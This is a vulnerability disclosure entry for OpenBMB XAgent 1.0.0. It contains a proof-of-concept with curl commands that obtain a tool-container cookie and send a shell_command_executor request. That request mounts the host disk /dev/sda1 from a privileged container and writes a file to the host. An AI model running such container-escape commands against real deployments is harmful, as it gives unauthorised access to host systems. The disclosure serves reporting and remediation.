| Título | OpenBMB XAgent v1.0.0 Container Escapes |
|---|
| Descripción | Docker Enabling Privileged Mode Causes Container Escapes.
1. Installation and startup XAgent (https://github.com/OpenBMB/XAgent)
```bash
git clone https://github.com/OpenBMB/XAgent.git
docker-compose up -d
```
2. Creating Tool Container
```bash
curl -v --request POST 'http://localhost:8080/get_cookie'
...
< HTTP/1.1 200 OK
...
< set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; Path=/; SameSite=lax
...
```
Extract container ID: set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx;
3. Execute malicious command escape container
```
curl --request POST 'http://localhost:8080/execute_tool' --header 'Cookie: node_id={{Container ID}}' --header 'Content-Type: application/json' --data \
'{
"tool_name":"shell_command_executor",
"arguments":{"command":"mkdir test; mount /dev/sda1 test; echo hello > test/hello.txt"}
}'
```
The file created in containers on the host: `cat /boot/hello.txt`. |
|---|
| Fuente | ⚠️ https://github.com/OpenBMB/XAgent/issues/386 |
|---|
| Usuario | zznQ (UID 64000) |
|---|
| Sumisión | 2024-02-19 10:35 (hace 2 años) |
|---|
| Moderación | 2024-02-29 14:24 (10 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 255265 [OpenBMB XAgent 1.0.0 Privileged Mode escalada de privilegios] |
|---|
| Puntos | 20 |
|---|